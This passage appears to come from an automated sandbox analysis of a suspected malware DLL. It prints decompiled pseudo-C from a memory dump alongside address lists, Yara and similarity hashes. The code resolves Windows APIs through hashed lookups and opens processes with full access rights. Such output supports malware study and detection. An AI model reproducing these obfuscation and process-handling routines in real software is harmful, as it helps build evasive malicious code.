						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6EC6F4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6EC6F4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6EC6F4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6EC6F4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6EC738F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6EC6F4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6EC6F828( *((intOrPtr*)(_t439 + 4)), E6EC6F4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6EC73064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6EC6F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6EC6F4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6EC6F4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6EC6F4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6EC6F4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6EC738F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6EC6F828( *((intOrPtr*)(_t439 + 8)), E6EC6F4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6EC6F4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6ec6a4f2
0x6ec6a4f4
0x6ec6a4ff
0x6ec6a505
0x6ec6a509
0x6ec6a50e
0x6ec6a514
0x6ec6a524
0x00000000
0x6ec6a526
0x6ec6a526
0x6ec6a531
0x6ec6a531
0x6ec6aaaf
0x6ec6aab1
0x6ec6aab2
0x6ec6aaf1
0x6ec6aaf5
0x6ec6ab03
0x6ec6ab11
0x6ec6ab11
0x6ec6aafc
0x6ec6ab17
0x6ec6ab1c
0x00000000
0x6ec6ab1c
0x6ec6ab00
0x6ec6ab01
0x00000000
0x6ec6a53b
0x6ec6a53b
0x6ec6a53f
0x6ec6a646
0x6ec6a646
0x6ec6a64b
0x6ec6a75c
0x6ec6a760
0x6ec6a765
0x6ec6a769
0x6ec6a893
0x6ec6a895
0x6ec6a899
0x6ec6a8a2
0x6ec6a8ab
0x6ec6a8af
0x6ec6a8b8
0x6ec6a8bf
0x6ec6a8c0
0x6ec6a8c4
0x6ec6a8c8
0x6ec6a8cc
0x6ec6a8ce
0x6ec6aa38
0x6ec6aa38
0x6ec6aa40
0x6ec6aa58
0x6ec6aa5a
0x6ec6aa5c
0x6ec6aa96
0x6ec6aa96
0x6ec6aa98
0x6ec6aa98
0x6ec6aa9b
0x6ec6aab6
0x6ec6aaca
0x6ec6aacd
0x6ec6aad2
0x6ec6aadd
0x6ec6aade
0x6ec6aae1
0x6ec6aae3
0x6ec6aaec
0x00000000
0x6ec6aaec
0x6ec6aa9d
0x6ec6aaa1
0x6ec6aaaa
0x00000000
0x6ec6aaaa
0x6ec6aa6d
0x6ec6aa7d
0x6ec6aa81
0x6ec6aa81
0x6ec6aa84
0x6ec6aa87
0x6ec6aa8a
0x6ec6aa90
0x00000000
0x00000000
0x00000000
0x6ec6aa92
0x6ec6a8d6
0x6ec6a8d6
0x6ec6a8d8
0x6ec6a8dc
0x6ec6a8e1
0x6ec6a8e3
0x6ec6a8e7
0x6ec6a8ea
0x6ec6a8f2
0x6ec6a8f4
0x00000000
0x00000000
0x6ec6a90b
0x6ec6a926
0x6ec6a928
0x6ec6a93b
0x6ec6a93d
0x6ec6a93f
0x6ec6a95a
0x6ec6a95a
0x6ec6a95e
0x6ec6a960
0x00000000
0x00000000
0x6ec6a962
0x6ec6a965
0x6ec6a986
0x6ec6a9a5
0x6ec6a9ab
0x6ec6a9ae
0x6ec6a9b3
0x6ec6a9b4
0x6ec6a9b8
0x00000000
0x00000000
0x6ec6a9c0
0x6ec6a9c0
0x6ec6a9c2
0x6ec6a9ce
0x6ec6a9da
0x6ec6a9e4
0x6ec6a9e7
0x6ec6a9ea
0x6ec6a9ee
0x6ec6a9f5
0x6ec6a9f9
0x6ec6a9fd
0x6ec6a9fe
0x6ec6aa02
0x6ec6aa07
0x6ec6aa0c
0x6ec6aa10
0x6ec6aa14
0x6ec6aa1a
0x6ec6aa20
0x6ec6aa26
0x6ec6aa2c
0x6ec6aa31
0x6ec6aa32
0x6ec6aa32
0x00000000
0x6ec6a9c2
0x00000000
0x6ec6a965
0x6ec6a943
0x6ec6a954
0x6ec6a956
0x6ec6a958
0x00000000
0x00000000
0x00000000
0x6ec6a958
0x6ec6a96b
0x00000000
0x6ec6a96b
0x6ec6a76f
0x6ec6a772
0x6ec6a774
0x00000000
0x00000000
0x6ec6a77c
0x6ec6a77c
0x6ec6a77e
0x6ec6a77e
0x6ec6a78f
0x6ec6a791
0x6ec6a794
0x00000000
0x00000000
0x6ec6a88a
0x6ec6a88b
0x6ec6a88d
0x00000000
0x00000000
0x00000000
0x6ec6a88d
0x6ec6a79a
0x6ec6a79d
0x6ec6a7a7
0x6ec6a7ac
0x6ec6a7ae
0x6ec6a7b4
0x6ec6a7bb
0x6ec6a7bf
0x6ec6a7c4
0x6ec6a7c8
0x6ec6ac03
0x6ec6ac17
0x6ec6ac3a
0x6ec6ac3f
0x6ec6ac3f
0x6ec6a7df
0x6ec6a7e4
0x6ec6a7e4
0x6ec6a7e4
0x6ec6a7e4
0x6ec6a7ea
0x6ec6a7ef
0x6ec6a7f1
0x6ec6a7f6
0x6ec6a7fd
0x6ec6a802
0x6ec6a804
0x6ec6abc1
0x6ec6abd2
0x6ec6abec
0x6ec6abf1
0x6ec6abf1
0x6ec6a81a
0x6ec6a81f
0x6ec6a81f
0x6ec6a81f
0x6ec6a81f
0x6ec6a833
0x6ec6a851
0x6ec6a856
0x6ec6a866
0x6ec6a883
0x6ec6a885
0x6ec6a885
0x00000000
0x6ec6a79d
0x6ec6a653
0x6ec6a653
0x6ec6a655
0x6ec6a65c
0x6ec6a66a
0x6ec6a66c
0x6ec6a66f
0x6ec6a676
0x6ec6a678
0x6ec6a6a9
0x6ec6a6b8
0x6ec6a6ba
0x6ec6a6bc
0x6ec6a6da
0x6ec6a6dc
0x6ec6a6de
0x6ec6a6f1
0x6ec6a710
0x6ec6a716
0x6ec6a719
0x6ec6a730
0x6ec6a74c
0x6ec6a74e
0x6ec6a74e
0x6ec6a74e
0x6ec6a74e
0x6ec6a6de
0x00000000
0x6ec6a6bc
0x6ec6a67c
0x6ec6a67c
0x6ec6a67e
0x6ec6a68f
0x6ec6a691
0x6ec6a693
0x00000000
0x00000000
0x6ec6a69f
0x6ec6a6a0
0x6ec6a6a7
0x00000000
0x00000000
0x00000000
0x6ec6a6a7
0x6ec6a695
0x6ec6a698
0x00000000
0x00000000
0x6ec6a751
0x6ec6a751
0x6ec6a752
0x6ec6a752
0x00000000
0x6ec6a545
0x6ec6a547
0x6ec6a547
0x6ec6a549
0x6ec6a550
0x6ec6a55e
0x6ec6a560
0x6ec6a564
0x6ec6a568
0x6ec6a56a
0x6ec6a598
0x6ec6a59b
0x6ec6a5a0
0x6ec6a5a4
0x6ec6a5a9
0x6ec6a5b0
0x6ec6a5b5
0x6ec6a5b7
0x6ec6ab7e
0x6ec6ab8f
0x6ec6abaf
0x6ec6abb4
0x6ec6abb4
0x6ec6a5cd
0x6ec6a5d2
0x6ec6a5d2
0x6ec6a5d2
0x6ec6a5d2
0x6ec6a5e4
0x6ec6a5e6
0x6ec6a5e8
0x6ec6a5f9
0x6ec6a5f9
0x6ec6a5ff
0x6ec6a604
0x6ec6a608
0x6ec6a60e
0x6ec6a615
0x6ec6a61a
0x6ec6a61c
0x6ec6ab32
0x6ec6ab43
0x6ec6ab64
0x6ec6ab69
0x6ec6ab69
0x6ec6a633
0x6ec6a638
0x6ec6a638
0x6ec6a638
0x6ec6a638
0x6ec6a63b
0x6ec6a63b
0x00000000
0x6ec6a63b
0x6ec6a56e
0x6ec6a56e
0x6ec6a570
0x6ec6a581
0x6ec6a583
0x6ec6a585
0x00000000
0x00000000
0x6ec6a591
0x6ec6a592
0x6ec6a596
0x00000000
0x00000000
0x00000000
0x6ec6a596
0x6ec6a587
0x6ec6a58a
0x00000000
0x00000000
0x6ec6a63c
0x6ec6a63c
0x6ec6a63d
0x6ec6a63d
0x00000000
0x6ec6a549
0x6ec6a53f

Strings

, xrefs: 6EC6AAF7

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 643c946711ce9d5d803d39c20298df03835820fc3e017d76232134b93ebd732b
Instruction ID: 9be95ad637240a22607a93639b2d521f0b466a2e6ad0b0d6d3a6a4f03a980333
Opcode Fuzzy Hash: 643c946711ce9d5d803d39c20298df03835820fc3e017d76232134b93ebd732b
Instruction Fuzzy Hash: D7126F725083519FC714DFA4C8D0AAFB7A9AFC5704F104A2DE999972A5FB30EC01CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6EC68428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6EC68428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t315;
				intOrPtr _t317;
				signed int* _t322;
				signed int _t323;
				signed int _t324;
				void* _t343;
				void* _t414;
				signed int _t415;
				signed int* _t421;
				signed int _t427;
				intOrPtr* _t428;
				intOrPtr* _t429;
				signed int _t431;
				signed int _t433;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t442;
				void* _t443;
				signed int _t444;
				void* _t445;
				signed int _t446;
				intOrPtr* _t449;

				 *_t449 = __ecx + 0x1c;
				 *((intOrPtr*)(_t449 + 0x68)) = __edx;
				 *(_t449 + 4) = __ecx;
				 *(_t449 + 0x84) = 0;
				 *((intOrPtr*)(_t449 + 0x78)) = __ecx + 4;
				while(1) {
					_t413 =  *(_t449 + 0x6c);
					E6EC6B658(_t449 + 0x24,  *(_t449 + 0x6c), 0x7fffffff);
					if(E6EC6F4D0(_t449 + 0x24) == 0) {
						goto L3;
					} else {
						( *(_t449 + 4))[0xb] = 0;
						E6EC6F654(_t449 + 0x24);
					}
					L60:
					_t317 = 0xffffffffffffffff;
					L62:
					if(_t317 != 0) {
						L65:
						return _t317;
					}
					if( *(_t449 + 0x84) != 0x20) {
						E6EC72234(0x5dc, _t413, _t430);
						 *(_t449 + 0x84) =  *(_t449 + 0x84) + 1;
						continue;
					}
					_t317 = 0xffffffffffffffff;
					goto L65;
					L3:
					__eflags =  *( *(_t449 + 4));
					if( *( *(_t449 + 4)) <= 0) {
						L21:
						__eflags =  *(_t449 + 0x20);
						if( *(_t449 + 0x20) <= 0) {
							L33:
							E6EC6F654(_t449 + 0x24);
							_t173 =  *(_t449 + 4);
							__eflags = _t173[0xb];
							if(_t173[0xb] == 0) {
								L46:
								 *((intOrPtr*)(_t449 + 8)) = 0;
								 *((intOrPtr*)(_t449 + 0xc)) = 0;
								E6EC6F584(_t449 + 0x14, 0);
								 *((intOrPtr*)(_t449 + 0x34)) =  *((intOrPtr*)(_t449 + 0x68));
								 *((intOrPtr*)(_t449 + 0x38)) = 0;
								E6EC6F584(_t449 + 0x40, 0);
								_t178 =  *(_t449 + 4);
								_t414 = 0x40;
								__eflags = _t178[6] - 0x40;
								_t415 =  <  ? _t178[6] : _t414;
								 *(_t449 + 0x80) = _t415;
								__eflags = _t415;
								if(_t415 <= 0) {
									L57:
									_t413 = E6EC6F4BC(_t449 + 0x14, 0);
									_t180 = E6EC72908( *((intOrPtr*)(_t449 + 0xc)), _t179, 0x3e8);
									_t132 = _t180 - 0x80; // -128
									_t181 = _t132;
									__eflags = _t181 - 0x3f;
									_t315 =  <=  ? _t181 : _t180;
									__eflags = _t315 - 0x102;
									if(_t315 == 0x102) {
										L59:
										E6EC6B5C4(_t449 + 0x34);
										E6EC6B5C4(_t449 + 8);
										goto L60;
									}
									__eflags = _t315 - 0x3f;
									if(_t315 <= 0x3f) {
										__eflags = _t315 << 2;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E6EC6F4BC( *(_t449 + 4), _t315 << 2)));
										_t188 = E6EC6F4BC( *(_t449 + 0x7c), _t315 << 2);
										_t413 =  *(_t449 + 4);
										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
										E6EC6B5C4(_t449 + 0x34);
										E6EC6B5C4(_t449 + 8);
										goto L62;
									}
									goto L59;
								}
								_t446 = 0;
								__eflags = 0;
								while(1) {
									E6EC6CA8C(_t449 + 0x4c);
									_t413 = 0;
									_t343 = _t449 + 0x4c;
									 *((char*)(_t343 + 4)) = 0;
									 *((intOrPtr*)(_t343 + 0x20)) = 0;
									__eflags = E6EC6C280(_t343);
									if(__eflags != 0) {
										break;
									}
									E6EC6F828(_t449 + 0x14, E6EC6F4CC(_t449 + 0x10) + 4);
									 *((intOrPtr*)(E6EC6F4BC(_t449 + 0x14, E6EC6F4CC(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
									_t202 = E6EC73064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t202;
									if(_t202 == 0) {
										L51:
										_t413 =  *(_t449 + 0x6c);
										__eflags = _t413;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t413 - 0xffffffff;
										if(__eflags != 0) {
											E6EC6F828(_t449 + 0x40, E6EC6F4CC(_t449 + 0x3c) + 4);
											 *(E6EC6F4BC(_t449 + 0x40, E6EC6F4CC(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
											E6EC6CD24(_t449 + 0x4c, __eflags);
											_t446 = _t446 + 1;
											__eflags = _t446 -  *(_t449 + 0x80);
											if(_t446 <  *(_t449 + 0x80)) {
												continue;
											}
											_t431 = 0;
											__eflags = 0;
											do {
												_t211 = E6EC6F4BC( *(_t449 + 4), _t431 * 4);
												_t212 = E6EC6F4BC(_t449 + 0x40, _t431 * 4);
												E6EC68B58( *_t211, E6EC702B0(0x60a28c5c, 0x840d15ae),  *_t212, 0, 0);
												_t431 = _t431 + 1;
												__eflags = _t431 -  *(_t449 + 0x80);
											} while (_t431 <  *(_t449 + 0x80));
											goto L57;
										}
										break;
									}
									_t413 = 0;
									_push(2);
									_push(0);
									_push(0);
									_push(_t449 + 0x6c);
									_push( *((intOrPtr*)(_t449 + 0x78)));
									_push( *((intOrPtr*)(_t449 + 0x60)));
									_push(0xffffffff);
									asm("int3");
									asm("int3");
									__eflags = _t202;
									if(__eflags != 0) {
										break;
									}
									goto L51;
								}
								E6EC6CD24(_t449 + 0x4c, __eflags);
								goto L59;
							}
							_t427 =  *_t173;
							__eflags = _t427;
							if(_t427 <= 0) {
								goto L46;
							}
							_t430 = 0;
							__eflags = 0;
							_t322 =  &(_t173[1]);
							while(1) {
								_t433 = _t430 * 4;
								_t217 = E6EC6F4BC(_t322, _t433);
								_t218 =  *(_t449 + 4);
								__eflags =  *_t217 - _t218[0xc];
								if( *_t217 == _t218[0xc]) {
									break;
								}
								_t430 = _t430 + 1;
								__eflags = _t430 - _t427;
								if(_t430 < _t427) {
									continue;
								}
								goto L46;
							}
							__eflags = _t430 - 0xffffffff;
							if(_t430 != 0xffffffff) {
								_t219 = E6EC6F4CC( *_t449);
								__eflags = _t219 - _t433;
								if(_t219 > _t433) {
									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
									_t247 = E6EC6F4CC( *_t449);
									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
										 *((intOrPtr*)(_t449 + 0x90)) = E6EC6F4BC( *(_t449 + 4), _t433);
										 *((intOrPtr*)(_t449 + 0x8c)) = E6EC6F4BC( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
										E6EC738F0( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E6EC6F4CC( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
										_t449 = _t449 + 0xc;
									}
									E6EC6F828( *(_t449 + 4), E6EC6F4CC( *_t449) + 0xfffffffc);
									_t421 =  *(_t449 + 4);
									_t75 =  &(_t421[6]);
									 *_t75 = _t421[6] - 1;
									__eflags =  *_t75;
								}
								_t220 = E6EC6F4CC(_t322);
								__eflags = _t220 - _t433;
								if(_t220 > _t433) {
									_t430 = 4 + _t430 * 4;
									_t237 = E6EC6F4CC(_t322);
									__eflags = _t237 - _t430;
									if(_t237 > _t430) {
										_t238 = E6EC6F4BC(_t322, _t433);
										 *((intOrPtr*)(_t449 + 0x94)) = E6EC6F4BC(_t322, _t430);
										E6EC738F0(_t238,  *((intOrPtr*)(_t449 + 0x98)), E6EC6F4CC(_t322) - _t430);
										_t449 = _t449 + 0xc;
									}
									E6EC6F828(_t322, E6EC6F4CC(_t322) + 0xfffffffc);
									_t246 =  *(_t449 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E6EC6F828( *(_t449 + 4), E6EC6F4CC( *_t449) + 4);
								 *(E6EC6F4BC( *(_t449 + 4), E6EC6F4CC( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
								E6EC6F828(_t322, E6EC6F4CC(_t322) + 4);
								 *(E6EC6F4BC(_t322, E6EC6F4CC(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
							}
							goto L46;
						}
						_t323 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x7c) = _t323 * 4;
							_t428 = E6EC6F4BC(_t449 + 0x28, _t323 * 4);
							_t258 =  *(_t449 + 4);
							_t430 =  *_t258;
							__eflags = _t430;
							if(_t430 <= 0) {
								L29:
								_t437 = E6EC73064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t437;
								if(_t437 != 0) {
									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E6EC6F4BC(_t449 + 0x28,  *(_t449 + 0x7c)))));
									__eflags = _t439;
									if(_t439 != 0) {
										E6EC6F828( *(_t449 + 4), E6EC6F4CC( *_t449) + 4);
										 *(E6EC6F4BC( *(_t449 + 4), E6EC6F4CC( *_t449) + 0xfffffffc)) = _t439;
										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E6EC6F4BC(_t449 + 0x28,  *(_t449 + 0x7c));
										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
										E6EC6F828( *((intOrPtr*)(_t449 + 0x74)), E6EC6F4CC( &(( *(_t449 + 4))[1])) + 4);
										 *((intOrPtr*)(E6EC6F4BC( *((intOrPtr*)(_t449 + 0x74)), E6EC6F4CC( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t449 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
								goto L32;
							}
							_t438 = 0;
							__eflags = 0;
							 *(_t449 + 0x88) =  &(_t258[1]);
							while(1) {
								_t279 = E6EC6F4BC( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
								__eflags =  *_t279 -  *_t428;
								if( *_t279 ==  *_t428) {
									break;
								}
								_t438 = _t438 + 1;
								__eflags = _t438 - _t430;
								if(_t438 < _t430) {
									continue;
								}
								goto L29;
							}
							__eflags = _t438 - 0xffffffff;
							if(_t438 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t323 = _t323 + 1;
							__eflags = _t323 -  *(_t449 + 0x20);
						} while (_t323 <  *(_t449 + 0x20));
						goto L33;
					} else {
						_t324 = 0;
						__eflags = 0;
						do {
							 *(_t449 + 0x64) = _t324 * 4;
							_t429 = E6EC6F4BC( *(_t449 + 0x7c), _t324 * 4);
							_t430 =  *(_t449 + 0x20);
							__eflags = _t430;
							if(_t430 <= 0) {
								L11:
								_t430 =  &(( *(_t449 + 4))[1]);
								_t283 = E6EC6F4CC( &(( *(_t449 + 4))[1]));
								__eflags = _t283 -  *(_t449 + 0x64);
								if(_t283 >  *(_t449 + 0x64)) {
									_t443 = 4 + _t324 * 4;
									_t299 = E6EC6F4CC(_t430);
									__eflags = _t299 - _t443;
									if(_t299 > _t443) {
										 *((intOrPtr*)(_t449 + 0x9c)) = E6EC6F4BC(_t430,  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0x98)) = E6EC6F4BC(_t430, _t443);
										E6EC738F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6EC6F4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6EC6F828(_t430, E6EC6F4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6EC73064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6EC6F4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6EC6F4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6EC6F4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6EC6F4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6EC6F4BC( *(_t449 + 4), _t445);
										E6EC738F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6EC6F4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6EC6F828( *(_t449 + 4), E6EC6F4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6EC6F4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6ec68435
0x6ec6843b
0x6ec6843f
0x6ec68443
0x6ec6844e
0x6ec68452
0x6ec68457
0x6ec6845f
0x6ec6846f
0x00000000
0x6ec68471
0x6ec68479
0x6ec68480
0x6ec68480
0x6ec689d3
0x6ec689d5
0x6ec68a16
0x6ec68a18
0x6ec68a27
0x6ec68a33
0x6ec68a33
0x6ec68a22
0x6ec68a39
0x6ec68a3e
0x00000000
0x6ec68a3e
0x6ec68a26
0x00000000
0x6ec6848a
0x6ec6848e
0x6ec68491
0x6ec68599
0x6ec68599
0x6ec6859e
0x6ec686c1
0x6ec686c5
0x6ec686ca
0x6ec686ce
0x6ec686d2
0x6ec68808
0x6ec6880a
0x6ec6880e
0x6ec68817
0x6ec68822
0x6ec68826
0x6ec6882f
0x6ec68834
0x6ec6883a
0x6ec6883b
0x6ec6883f
0x6ec68843
0x6ec6884a
0x6ec6884c
0x6ec6898c
0x6ec6899d
0x6ec689a4
0x6ec689ab
0x6ec689ab
0x6ec689ae
0x6ec689b1
0x6ec689b4
0x6ec689ba
0x6ec689c1
0x6ec689c5
0x6ec689ce
0x00000000
0x6ec689ce
0x6ec689bc
0x6ec689bf
0x6ec689d8
0x6ec689f0
0x6ec689f3
0x6ec689f8
0x6ec68a02
0x6ec68a05
0x6ec68a08
0x6ec68a11
0x00000000
0x6ec68a11
0x00000000
0x6ec689bf
0x6ec68854
0x6ec68854
0x6ec68856
0x6ec6885a
0x6ec6885f
0x6ec68861
0x6ec68865
0x6ec68868
0x6ec68870
0x6ec68872
0x00000000
0x00000000
0x6ec68889
0x6ec688a4
0x6ec688a6
0x6ec688b4
0x6ec688b9
0x6ec688bb
0x6ec688d8
0x6ec688d8
0x6ec688dc
0x6ec688de
0x00000000
0x00000000
0x6ec688e0
0x6ec688e3
0x6ec68904
0x6ec68923
0x6ec68929
0x6ec6892c
0x6ec68931
0x6ec68932
0x6ec68939
0x00000000
0x00000000
0x6ec68941
0x6ec68941
0x6ec68943
0x6ec6894f
0x6ec6895b
0x6ec6897d
0x6ec68982
0x6ec68983
0x6ec68983
0x00000000
0x6ec68943
0x00000000
0x6ec688e3
0x6ec688bd
0x6ec688c3
0x6ec688c5
0x6ec688c6
0x6ec688c7
0x6ec688c8
0x6ec688cc
0x6ec688d0
0x6ec688d2
0x6ec688d3
0x6ec688d4
0x6ec688d6
0x00000000
0x00000000
0x00000000
0x6ec688d6
0x6ec688e9
0x00000000
0x6ec688e9
0x6ec686d8
0x6ec686da
0x6ec686dc
0x00000000
0x00000000
0x6ec686e6
0x6ec686e6
0x6ec686e8
0x6ec686eb
0x6ec686ed
0x6ec686f5
0x6ec686fc
0x6ec68700
0x6ec68703
0x00000000
0x00000000
0x6ec687ff
0x6ec68800
0x6ec68802
0x00000000
0x00000000
0x00000000
0x6ec68802
0x6ec68709
0x6ec6870c
0x6ec68715
0x6ec6871a
0x6ec6871c
0x6ec68728
0x6ec6872c
0x6ec68731
0x6ec68735
0x6ec68b12
0x6ec68b26
0x6ec68b48
0x6ec68b4d
0x6ec68b4d
0x6ec6874b
0x6ec68750
0x6ec68754
0x6ec68754
0x6ec68754
0x6ec68754
0x6ec68759
0x6ec6875e
0x6ec68760
0x6ec68764
0x6ec6876b
0x6ec68770
0x6ec68772
0x6ec68ad3
0x6ec68ae2
0x6ec68afb
0x6ec68b00
0x6ec68b00
0x6ec68785
0x6ec6878a
0x6ec6878e
0x6ec6878e
0x6ec6878e
0x6ec687a0
0x6ec687c1
0x6ec687c9
0x6ec687d7
0x6ec687f5
0x6ec687fb
0x6ec687fb
0x00000000
0x6ec6870c
0x6ec685a4
0x6ec685a4
0x6ec685a6
0x6ec685ad
0x6ec685bb
0x6ec685bd
0x6ec685c1
0x6ec685c3
0x6ec685c5
0x6ec68600
0x6ec6860f
0x6ec68611
0x6ec68613
0x6ec68631
0x6ec68633
0x6ec68635
0x6ec68647
0x6ec68665
0x6ec6866e
0x6ec68671
